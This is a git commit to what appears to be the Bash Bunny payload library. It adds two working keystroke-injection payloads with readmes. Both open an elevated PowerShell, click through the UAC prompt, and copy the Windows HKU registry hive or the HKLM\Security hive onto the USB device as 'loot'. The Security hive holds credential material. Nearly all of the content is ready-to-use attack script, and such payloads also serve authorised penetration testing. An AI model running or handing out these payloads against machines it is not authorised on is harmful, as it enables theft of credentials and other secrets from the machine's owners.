Added new payload WIN_PoSH_HKU_RegBackUp (#424)

* Add files via upload * Update readme.md * Update payload.txt * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Add files via upload * Update readme.md * Update readme.md * Add Payload WIN_PoSH_HKU_RegBackUp * Update readme.md * Update payload.txt * Change for admin shell * Update readme.md * Update payload.txt * Update payload.txt * Update readme.md * Added payload WIN_PoSH_SaveSecurityHive Added new payload to exfiltration that saves the HKLM security hive to the bunny
2020-12-14 23:53:42 +00:00 · 2020-12-14 23:53:42 +00:00 · 3904f165d9
parent b8a329232a
commit 3904f165d9
4 changed files with 101 additions and 0 deletions
--- a/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/payload.txt
+++ b/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/payload.txt
@ -0,0 +1,23 @@
+# Title:       	Backup User registry (HKU)
+# Description:  Uses PowerShell, to run Reg.exe to export the HKU entry to a file on the bunny  
+# Author:       Cribbit
+# Version:      1.1
+# Category:     Exfiltration
+# Target:       Windows 10 (Creators Update) (Powershell)
+# Attackmodes:	HID & STORAGE	
+# Config: 	Usesful root keys [ HKLM | HKCU | HKCR | HKU | HKCC ]
+
+LED SETUP
+ATTACKMODE HID STORAGE
+
+LED ATTACK
+Q DELAY 200
+REM RUN WIN powershell -NoP -NonI -W Hidden -Exec Bypass ".(Reg EXPORT HKU ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\keys.reg'))"
+Q GUI x
+Q STRING a
+Q DELAY 100
+Q ALT y
+Q DELAY 100
+Q STRING "Reg EXPORT HKU ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\keys.reg') /y"
+Q ENTER 
+LED FINISH
--- a/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/readme.md
+++ b/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/readme.md
@ -0,0 +1,30 @@
+# Backup User registry (HKU)
+* Author: Cribbit 
+* Version: 1.1
+* Target: Windows 10 (Creators Update) (Powershell)
+* Category: Exfiltration
+* Attackmode: HID & STORAGE
+
+## Change Log
+| Version | Changes                        |
+| ------- | -------------------------------|
+| 1.0     | Initial release                |
+| 1.1     | Use Admin Shell (for all keys) |
+
+## Description
+Uses PowerShell, to run Reg.exe to export the HKU entry to a file on the bunny.
+
+## Configuration
+RootKeys: [ HKLM | HKCU | HKCR | HKU | HKCC ]
+
+Usesful Reg.exe export parameters:
+* /y       Force overwriting the existing file without prompt.
+* /reg:32  Specifies the key should be accessed using the 32-bit registry view.
+* /reg:64  Specifies the key should be accessed using the 64-bit registry view.
+
+## Colors
+| Status    | Color                         | Description                                      |
+| --------- | ------------------------------| ------------------------------------------------ |
+| SETUP     | Magenta solid                 | Setting attack mode                              | 
+| ATTACK    | Yellow single blink           | Injecting Powershell script                      | 
+| FINISH    | Green blink followed by SOLID | Script is finished                               |
--- a/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/payload.txt
+++ b/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/payload.txt
@ -0,0 +1,22 @@
+# Title:       	Save security hive
+# Description:  Uses PowerShell, to run Reg.exe to save security hive to the bunny.  
+# Author:       Cribbit
+# Version:      1.0
+# Category:     Exfiltration
+# Target:       Windows 10 Creators Update (Powershell)
+# Attackmodes:  HID & STORAGE
+# Props:        Ben Clark (RTFM)	
+
+LED SETUP
+ATTACKMODE HID STORAGE
+
+LED ATTACK
+Q DELAY 200
+Q GUI x
+Q STRING a
+sleep 2
+Q ALT y
+sleep 2
+Q STRING "Reg SAVE HKLM\Security ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\'+\$env:computername+'_security.hive') /y"
+Q ENTER 
+LED FINISH
--- a/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/readme.md
+++ b/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/readme.md
@ -0,0 +1,26 @@
+# Save security hive
+* Author: Cribbit 
+* Version: 1.0
+* Target: Windows 10 (Creators Update) (Powershell)
+* Category: Exfiltration
+* Attackmode: HID & STORAGE
+* Props: Ben Clark (RTFM)
+
+## Change Log
+| Version | Changes                       |
+| ------- | ------------------------------|
+| 1.0     | Initial release               |
+
+## Description
+Uses PowerShell, to run Reg.exe to save security hive to the bunny.
+## Configuration
+Usesful Reg.exe save parameters:
+* /y       Force overwriting the existing file without prompt.
+* /reg:32  Specifies the key should be accessed using the 32-bit registry view.
+* /reg:64  Specifies the key should be accessed using the 64-bit registry view.
+## Colors
+| Status    | Color                         | Description                                      |
+| --------- | ------------------------------| ------------------------------------------------ |
+| SETUP     | Magenta solid                 | Setting attack mode                              | 
+| ATTACK    | Yellow single blink           | Injecting Powershell script                      | 
+| FINISH    | Green blink followed by SOLID | Script is finished                               |